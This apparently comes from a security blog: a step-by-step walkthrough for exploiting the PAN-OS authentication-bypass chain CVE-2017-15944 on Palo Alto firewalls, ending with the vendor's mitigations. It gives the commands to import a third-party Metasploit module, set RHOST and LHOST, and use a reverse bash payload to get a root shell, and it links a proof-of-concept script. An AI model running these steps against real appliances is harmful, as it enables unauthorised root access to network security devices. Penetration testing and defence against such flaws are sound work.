Last year, a critical remote code execution vulnerability was found in Palo Alto Network Firewalls by Philip Pettersson. Palo Alto Network Firewalls has a component called as PAN-OS whose versions 6.1.18, 7.0.18, 7.1.13, 8.0.5 and earlier versions are core affected with this vulnerability.
Palo Alto also released a public advisory for CVE-2017-15944. PAN-OS and Panorama contains multiple vulnerabilities that, when exploited in conjunction could lead to remote code execution prior to authentication.
Palo Alto Networks has also advised customers to avoid exposing the web interface of its devices to the Internet, but the Sonar and Shodan search engines show that it’s not uncommon for organizations to make it remotely accessible.
The above module exploits a chain of vulnerabilities in Palo Alto Networks products running PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using an authentication bypass flaw to to exploit an XML injection issue, which is then abused to create an arbitrary directory, and finally gains root code execution by exploiting a vulnerable cron script.
This module uses an initial reverse TLS callback to stage arbitrary payloads on the target appliance. The cron job used for the final payload runs every 15 minutes by default and exploitation can take up to 20 minutes.
Although this module is not available in Metasploit Framework, but you can easily add this module into MSF as shown below:
- Step 1 – Download the Panos Readsessionvars Module with the help of wget command,
- Step 2 – Copy the module file (panos_readsessionvars.rb) into /usr/share/metasploit-framework/modules/exploits/linux/http/ directory
You can also test that whether your target is vulnerable or not with a simple GET Request as shown below:
If you see the above output (@start@Success@end@) in your screen, then it means your target is vulnerable and you actually created an authentication cookie.
It not fully authentication bypass but it will actually opens some PHP Libraries like /php/utils/debug.php as shown below:
Furthermore, you can also test it with a simple script made by 0xbug hosted at https://github.com/0xbug/CVE-2017-15944-POC
Syntax: python panos-poc.py http[s]://vulnerable-ip/
Now Let’s try the to exploit the same vulnerability with Metasploit Framework, fire up your MSF with command msfconsole in your terminal.
As you know, we imported this module from outside so just type “reload_all” command inside your msf> terminal to reload all modules.
Now type “search panos” to check whether your module is there or not.
Now to use the above module, type “use exploit/linux/http/panos_readsessionvars” and furthermore, type “show options” to view all the details about the module which you need to set.
Now define your target by typing “set RHOST <Target>”
We’ve tried so many payloads but our favorite payload is “cmd/unix/reverse_bash” which works like a charm for us and can be set by typing “set payload cmd/unix/reverse_bash” and also define your Localhost IP by typing “set LHOST <Your-IP>“.
After setting up all the parameters, type run or exploit.
This module uses an initial reverse TLS callback to stage arbitrary payloads on the target appliance. The cron job used for the final payload runs every 15 minutes by default and exploitation can take up to 20 minutes and after that will gives you directly root access shell as shown below:
Palo Alto Networks has released content update 756 including vulnerability signatures #40483 and #40484 that can be used as an interim mitigation to protect PAN-OS devices until the device software is upgraded.
Note that signatures 40483 and 40484 must be applied to a firewall rule securing traffic destined for the Management interface. This issue affects the management interface of the device and is strongly mitigated by following best practices for the isolation of management interfaces for security appliances.
They also recommend that the management interface be isolated and strictly limited only to security administration personnel through either network segmentation or using the IP access control list restriction feature within PAN-OS. An alternative mitigation includes the use of a Panorama central manager and disabling of http and https management on each of the vulnerable appliance, then use the Panorama context switching feature to remotely access the web interface of the device.